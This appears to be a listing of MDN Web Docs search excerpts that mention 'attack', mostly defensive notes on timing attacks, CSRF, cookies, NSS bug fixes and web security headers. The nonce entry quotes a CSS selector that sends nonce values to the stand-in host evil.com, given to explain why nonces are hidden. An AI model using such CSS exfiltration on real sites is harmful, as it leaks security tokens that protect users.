gerprint: 27995829fe6a7515c1bfe848f9c4761db16c225929257bf40d0894f29ea8baf2 cn = opentrust root ca g3 sha-256 fingerprint: b7c36231706e81078c367cb896198f1e3208dd926949dd8f5709a410f75b6292 bugs fixed in nss 3.41 bug 1412829, reject empty supported_signature_algorithms in certificate request in tls 1.2 bug 1485864 - cache side-channel variant of the bleichenbacher attack (cve-2018-12404) bug 1481271 - resend the same ticket in clienthello after helloretryrequest bug 1493769 - set session_id for external resumption tokens bug 1507179 - reject ccs after handshake is complete in tls 1.3 this bugzilla query returns all the bugs fixed in nss 3.41: https://bugzilla.mozilla.org/buglist.cgi?resolution=fixed&classification=components&query_format=advan...
nss tech note7
to prevent denial-of-service attacks with huge public keys, nss disallows modulus size greater than 8192 bits.
NSS environment variables
3.12 nss_ssl_cbc_random_iv string ("0", "1") controls the workaround for the beast attack on ssl 3.0 and tls 1.0.
sslintro.html
specifies a callback function used to authenticate an incoming certificate (optional for servers, necessary for clients to avoid "man-in-the-middle" attacks).
Zest tools
the following tools currently support zest: owasp zed attack proxy the zap add-on allows the user to create, edit and run zest scripts.
Components.utils.Sandbox
if the sandbox interacts with untrusted content this should be set to false when possible to further reduce possible attack surface.
nsIURI
this is useful for authentication, managing sessions, or for checking the origin of an uri to prevent cross-site scripting attacks while using methods such as window.postmessage().
Setting HTTP request headers
by not advertising to all sites what extensions are installed this improves both privacy (this makes it harder to track a user known by his set of plugins, addons and extensions) and security (some plugins, addons and extensions may be known to have flaws by attackers).
Storage
by binding the parameters, you prevent possible sql injection attacks since a bound parameter can never be executed as sql.
Debugger-API - Firefox Developer Tools
by design, it ought not to introduce security holes, so in principle it could be made available to content as well; but it is hard to justify the security risks of the additional attack surface.
Cookies - Firefox Developer Tools
same-site cookies allow servers to mitigate the risk of csrf and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.
Animation.currentTime - Web APIs
her animation's currenttime to half her keyframeeffect's duration: alicechange.currenttime = alicechange.effect.timing.duration / 2; a more generic means of seeking to the 50% mark of an animation would be: animation.currenttime = animation.effect.getcomputedtiming().delay + animation.effect.getcomputedtiming().activeduration / 2; reduced time precision to offer protection against timing attacks and fingerprinting, the precision of animation.currenttime might get rounded depending on browser settings.
Animation.startTime - Web APIs
waapicats.appendchild(newcat); } reduced time precision to offer protection against timing attacks and fingerprinting, the precision of animation.starttime might get rounded depending on browser settings.
AnimationTimeline.currentTime - Web APIs
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of animationtimeline.currenttime might get rounded depending on browser settings.
AudioParam - Web APIs
var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); specifications specification status comment web audio api the definition of 'audioparam' in that specification.
BaseAudioContext.createDynamicsCompressor() - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
BaseAudioContext.currentTime - Web APIs
console.log(audioctx.currenttime); reduced time precision to offer protection against timing attacks and fingerprinting, the precision of audioctx.currenttime might get rounded depending on browser settings.
Constraint validation API - Web APIs
even though client-side validation can prevent many common kinds of invalid values, invalid ones can still be sent by older browsers or by attackers trying to trick your web application.
DynamicsCompressorNode.knee - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
DynamicsCompressorNode.ratio - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
DynamicsCompressorNode.release - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
DynamicsCompressorNode.threshold - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
Event.timeStamp - Web APIs
</p> <p>timestamp: <span id="time">-</span></p> javascript function gettime(event) { var time = document.getelementbyid("time"); time.firstchild.nodevalue = event.timestamp; } document.body.addeventlistener("keypress", gettime); result reduced time precision to offer protection against timing attacks and fingerprinting, the precision of event.timestamp might get rounded depending on browser settings.
File.lastModified - Web APIs
const filewithdate = new file([], 'file.bin', { lastmodified: new date(2017, 1, 1), }); console.log(filewithdate.lastmodified); //returns 1485903600000 const filewithoutdate = new file([], 'file.bin'); console.log(filewithoutdate.lastmodified); //returns current time reduced time precision to offer protection against timing attacks and fingerprinting, the precision of somefile.lastmodified might get rounded depending on browser settings.
File.lastModifiedDate - Web APIs
ut is a htmlinputelement: <input type="file" multiple id="myfileinput"> var fileinput = document.getelementbyid("myfileinput"); // files is a filelist object (similar to nodelist) var files = fileinput.files; for (var i = 0; i < files.length; i++) { alert(files[i].name + " has a last modified date of " + files[i].lastmodifieddate); } reduced time precision to offer protection against timing attacks and fingerprinting, the precision of somefile.lastmodifieddate.gettime() might get rounded depending on browser settings.
HTMLMediaElement.currentTime - Web APIs
example var video = document.createelement('video'); console.log(video.currenttime); usage notes reduced time precision to offer protection against timing attacks and fingerprinting, browsers may round or otherwise adjust the value returned by currenttime.
HTMLOrForeignElement.nonce - Web APIs
nonce hiding helps preventing that attackers exfiltrate nonce data via mechanisms that can grab data from content attributes like this: script[nonce~=whatever] { background: url("https://evil.com/nonce?whatever"); } specifications specification html living standard the definition of 'nonce' in that specification.
Pbkdf2Params - Web APIs
in this context, slow is good, since it makes it more expensive for an attacker to run a dictionary attack against the keys.
Push API - Web APIs
see the following articles for more information: cross-site request forgery (csrf) prevention cheat sheet preventing csrf and xsrf attacks for an app to receive push messages, it has to have an active service worker.
RTCIceCandidate.usernameFragment - Web APIs
this avoids crosstalk among multiple ongoing ice sessions, but, more importantly, helps secure ice transactions (and all of webrtc by extension) against attacks that might try to inject themselves into an ice exchange.
SubtleCrypto.deriveKey() - Web APIs
the more times the process is repeated, the more computationally expensive key derivation is: this makes it harder for an attacker to use brute-force to discover the key using a dictionary attack.
Geometry and reference spaces in WebXR - Web APIs
const radians_per_degree = math.pi / 180.0; let degreestoradians = (deg) => deg * radians_per_degree; let radianstodegrees = (rad) => rad / radians_per_degree; times and durations note that for security reasons, domhighrestimestamp usually introduces a small amount of imprecision to the clock in order to prevent it from being used in fingerprinting and timing-based attacks.
Web Authentication API - Web APIs
this resolves significant security problems related to phishing, data breaches, and attacks against sms texts or other second-factor authentication methods while at the same time significantly increasing ease of use (since users don't have to manage dozens of increasingly complicated passwords).
Window.crypto - Web APIs
although the property itself is read-only, all of its methods (and the methods of its child object, subtlecrypto) are not read-only, and therefore vulnerable to attack by polyfill.
@document - CSS: Cascading Style Sheets
this has been limited to use only in user and ua sheets in firefox 59 in nightly and beta — an experiment designed to mitigate potential css injection attacks (see bug 1035091).
HTML5 Parser - Developer guides
if an attacker could force a premature end-of-file, the parser might change which parts of the document it considered to be executable scripts.
HTTP authentication - HTTP
from firefox 59 onwards, image resources loaded from different origins to the current document are no longer able to trigger http authentication dialogs (bug 1423146), preventing user credentials being stolen if attackers were able to embed an arbitrary image into a third-party page.
Cross-Origin Resource Policy (CORP) - HTTP
cross-origin resource policy is a policy set by the cross-origin-resource-policy http header that lets web sites and applications opt in to protection against certain requests from other origins (such as those issued with elements like <script> and <img>), to mitigate speculative side-channel attacks, like spectre, as well as cross-site script inclusion attacks.
Public-Key-Pins - HTTP
the http public-key-pins response header used to associate a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates, however, it has been removed from modern browsers and is no longer supported.
Server - HTTP
avoid overly-detailed server values, as they can reveal information that might make it (slightly) easier for attackers to exploit known security holes.
SameSite cookies - HTTP
none used to be the default value, but recent browser versions made lax the default value to have reasonably robust defense against some classes of cross-site request forgery (csrf) attacks.
X-Frame-Options - HTTP
sites can use this to avoid click-jacking attacks, by ensuring that their content is not embedded into other sites.
414 URI Too Long - HTTP
there are a few rare conditions when this might occur: when a client has improperly converted a post request to a get request with long query information, when the client has descended into a loop of redirection (for example, a redirected uri prefix that points to a suffix of itself), or when the server is under attack by a client attempting to exploit potential security holes.
425 Too Early - HTTP
the hypertext transfer protocol (http) 425 too early response status code indicates that the server is unwilling to risk processing a request that might be replayed, which creates the potential for a replay attack.
Grammar and types - JavaScript
(this is similar to string interpolation features in perl, python, and more.) optionally, a tag can be added to allow the string construction to be customized, avoiding injection attacks, or constructing higher-level data structures from string contents.
Date.prototype.getTime() - JavaScript
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of new date().gettime() might get rounded depending on browser settings.
Date.now() - JavaScript
engines which have not been updated to support this method can work around the absence of this method using the following shim: if (!date.now) { date.now = function now() { return new date().gettime(); }; } examples reduced time precision to offer protection against timing attacks and fingerprinting, the precision of date.now() might get rounded depending on browser settings.
SharedArrayBuffer - JavaScript
for top-level documents, two headers will need to be set to cross-origin isolate your site: cross-origin-opener-policy with same-origin as value (protects your origin from attackers) cross-origin-embedder-policy with require-corp as value (protects victims from your origin) cross-origin-opener-policy: same-origin cross-origin-embedder-policy: require-corp to check if cross origin isolation has been successful, you can test against the crossoriginisolated property available to window and worker contexts: if (crossoriginisolated) { // post sharedarraybuffer } else {...
eval() - JavaScript
more importantly, a third-party code can see the scope in which eval() was invoked, which can lead to possible attacks in ways to which the similar function is not susceptible.